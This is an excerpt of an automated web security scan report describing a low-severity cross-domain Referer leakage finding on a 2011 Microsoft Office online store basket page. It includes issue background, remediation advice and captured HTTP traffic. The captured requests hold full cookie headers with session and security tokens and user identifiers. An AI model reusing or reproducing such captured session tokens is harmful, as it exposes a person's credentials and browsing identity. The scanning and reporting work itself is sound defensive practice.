Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828518287:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE; op390basketpagegum=a0qm1h421k27asr09a3thb27asq0963la5754; op390basketpageliid=a0qm1h421k27asr09a3thb27asq0963la5754; C5_TRACKING_TOKEN=ed794bbb18b94d4ab7bed7013f542b2d

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 22:02:34 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:02:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/basket.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /usa/basket.aspx?cache=-1528400984&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828193563:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE

Response

HTTP/1.1 200 OK
Date: Sat, 29 Oct 2011 01:51:14 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sun, 30-Oct-2011 01:51:14 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 07:51:15 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
</script>
       
       
       <link rel="SHORTCUT ICON" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/favicon.ico" />
       <link id="ctl10_cl1" href="http://.buyoffice.microsoft.com:8700/usa/basket.aspx&amp;culture=en-us" rel="canonical" />
...[SNIP]...
<!-- Home and product page changes -->


               <link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/css/style.css" />


   <link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/css/basket.css" />        


<![if !IE]>
   <link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/css/ff.css" />
<![endif]>
<link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/en-US/css/layout-mods.css" />
<!--[if IE 6]>
...[SNIP]...
<![endif]-->

       
       <script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery.tools-1.1.2.min.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/TrackByAjax.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/jquery-latest.pack.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/superscript.js"></script>


<script type="text/javascript" src="//nexus.ensighten.com/microsoftstore/Bootstrap.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/C5_662/cm/multimedia/OT_Files/c5_662_basket_contentBody.js"></script>


<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/js/PPRSAEnc.js"></script>

<script type="text/javascript" language="javascript" src="https://login.passport.com/ppsecure/JSPublicKey.srf"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/MSLiveIdUtils.js"></script>
<script type="text/javascript" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/mtagconfig-2.1.js"></script>
...[SNIP]...
</script>


<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/framework/js/submitthrottle.js" type="text/javascript"></script>
...[SNIP]...
<div class="customServTop">
               <img alt="" usemap="#topMap" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/custServOverlayTop.jpg" />
               <div class="title">
...[SNIP]...
<a href='http://office.microsoft.com' target="_blank">
           <img title="Microsoft.. Office" alt="Microsoft.. Office" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/office_logo.png" />
       </a>
...[SNIP]...
<a href="javascript:submitSearch();"><img title="Search" alt="Search" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/search_button.gif" /></a>
...[SNIP]...
<div class="basketPage">
       <link rel="stylesheet" type="text/css" href="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/css/thermometer.css" />

<div class="thermometer">
...[SNIP]...
<div class="image">
       
           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/therm_cart.gif" />
       
       
                           </div>
...[SNIP]...
<a title="update" class="updatebtn" border="0" onclick="__doPostBack('ctl14$ctl01$BasketList$ctl01$ctl17$ctl00','')" style="cursor:pointer;"><img alt="update" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/update.gif" /></a>
...[SNIP]...
<a href="http://www2.buyoffice.microsoft.com/usa/product.aspx?sku=10234528&amp;cache=1968341058&amp;culture=en-us"><img title="Office Home and Student 2010" alt="Office Home and Student 2010" class="searchImage" align="left" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_images/10234528.png" /></a>
...[SNIP]...
<div class="top"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/act2LicenseTop.gif" /></div>
...[SNIP]...
<div class="image">
                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/HS1license.gif" />
                       </div>
...[SNIP]...
<div class="divider"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/activDivider.gif" /></div>
...[SNIP]...
<div class="green_btn_sml"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />SELECT</div>
...[SNIP]...
<div class="top"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/act2LicenseTop_pc3.gif" /></div>
...[SNIP]...
<div class="image">
                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/HS3license.gif" />
                       </div>
...[SNIP]...
<div class="divider"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/activDivider.gif" /></div>
...[SNIP]...
<div class="green_btn_sml"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />SELECT</div>
...[SNIP]...
<div class="backupdvdBox_Top">
                                                   <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/backupdvdBoxTop.gif" />
                                               </div>
...[SNIP]...
<div class="upsellimage">
                                                       <img title="Office Home and Student 2010" alt="Office Home and Student 2010" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_images/dvdupsell.png" />
                                                   </div>
...[SNIP]...
<div class="icon">
                                                               <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/backupdvdoverlayIcon.gif" />
                                                           </div>
...[SNIP]...
<div class="cartDivider">
                                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_divider.gif" />
                                       </div>
...[SNIP]...
<a title="update" class="updatebtn" border="0" onclick="__doPostBack('ctl14$ctl01$BasketList$ctl02$ctl17$ctl00','')" style="cursor:pointer;"><img alt="update" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/update.gif" /></a>
...[SNIP]...
<a href="http://www2.buyoffice.microsoft.com/usa/product.aspx?sku=10234422&amp;cache=1968341058&amp;culture=en-us"><img title="Publisher 2010" alt="Publisher 2010" class="searchImage" align="left" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_images/10234422.png" /></a>
...[SNIP]...
<div class="top"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/act2LicenseTop.gif" /></div>
...[SNIP]...
<div class="image">
                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/HS1license.gif" />
                       </div>
...[SNIP]...
<div class="divider"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/activDivider.gif" /></div>
...[SNIP]...
<div class="green_btn_sml"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />SELECT</div>
...[SNIP]...
<div class="top"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/act2LicenseTop_pc3.gif" /></div>
...[SNIP]...
<div class="image">
                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/HS3license.gif" />
                       </div>
...[SNIP]...
<div class="divider"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/activDivider.gif" /></div>
...[SNIP]...
<div class="green_btn_sml"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />SELECT</div>
...[SNIP]...
<div class="backupdvdBox_Top">
                                                   <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/backupdvdBoxTop.gif" />
                                               </div>
...[SNIP]...
<div class="upsellimage">
                                                       <img title="Publisher 2010" alt="Publisher 2010" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_images/dvdupsell.png" />
                                                   </div>
...[SNIP]...
<div class="icon">
                                                               <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/backupdvdoverlayIcon.gif" />
                                                           </div>
...[SNIP]...
<div class="cartDivider">
                                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_divider.gif" />
                                       </div>
...[SNIP]...
<span>
                                                    <img title="Office Home and Student 2010 DVD" alt="Office Home and Student 2010 DVD" class="searchImage" align="left" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_images/10234795.png" />
                                               </span>
...[SNIP]...
<div class="top"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/act2LicenseTop.gif" /></div>
...[SNIP]...
<div class="image">
                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/HS1license.gif" />
                       </div>
...[SNIP]...
<div class="divider"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/activDivider.gif" /></div>
...[SNIP]...
<div class="green_btn_sml"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />SELECT</div>
...[SNIP]...
<div class="top"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/act2LicenseTop_pc3.gif" /></div>
...[SNIP]...
<div class="image">
                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/HS3license.gif" />
                       </div>
...[SNIP]...
<div class="divider"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/activDivider.gif" /></div>
...[SNIP]...
<div class="green_btn_sml"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />SELECT</div>
...[SNIP]...
<div class="backupdvdBox_Top">
                                                   <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/backupdvdBoxTop.gif" />
                                               </div>
...[SNIP]...
<div class="upsellimage">
                                                       <img title="Office Home and Student 2010 DVD" alt="Office Home and Student 2010 DVD" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_images/dvdupsell.png" />
                                                   </div>
...[SNIP]...
<div class="icon">
                                                               <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/backupdvdoverlayIcon.gif" />
                                                           </div>
...[SNIP]...
<div class="cartDivider">
                                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/cart_divider.gif" />
                                       </div>
...[SNIP]...
<br><a href="http://store.digitalriver.com/DRHM/servlet/ControllerServlet?Action=DisplayPage&Locale=en_US&SiteID=msdocs&eCommerceProvider=Digital+River+Inc.&id=DRAboutDigitalRiverPage" target="_blank">Digital River Inc.</a>, is the authorized reseller and merchant providing e-commerce services for this store. <a href="http://store.digitalriver.com/DRHM/servlet/ControllerServlet?Action=DisplayPage&Locale=en_US&SiteID=msdocs&eCommerceProvider=Digital+River+Inc.&id=DRPrivacyPolicyPage" target="_blank">Digital River Privacy Policy</a> <a href="http://store.digitalriver.com/DRHM/servlet/ControllerServlet?Action=DisplayPage&Locale=en_US&SiteID=msdocs&eCommerceProvider=Digital+River+Inc.&id=DRTermsAndConditionsPage" target="_blank">Terms of Sale</a>
...[SNIP]...
<div class="langpack_top">
                           <img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/langpack_top.png" />
                       </div>
...[SNIP]...
<div class="green_btn_lp"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />ADD</div>
...[SNIP]...
<a href="http://www2.buyoffice.microsoft.com/usa/default.aspx?cache=1968341058&amp;culture=en-us" class="noline"><img alt="" class="image" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/back_arrow_blue.gif" />CONTINUE SHOPPING</a>
...[SNIP]...
<div class="green_btn_crt"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />CONTINUE &gt;</div>
...[SNIP]...
<div class="green_btn_sml"><img alt="" border="0" src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/button_fr_grn_sml.gif" style="float:left" />ADD</div>
...[SNIP]...
<div class="logo">
   <img src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/logo_microsoft.gif" alt="Microsoft" title="Microsoft" border="0" />    
</div>
...[SNIP]...
</script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrendsasyncloader.js" type="text/javascript"></script>
<script src="//c5.img.digitalriver.com/gtimages/mso2010/assets/local/js/webtrends.js" type="text/javascript"></script>
<noscript>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="//m.webtrends.com/dcs4j59yd99k7m2wbr9i6h2as_1d9y/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
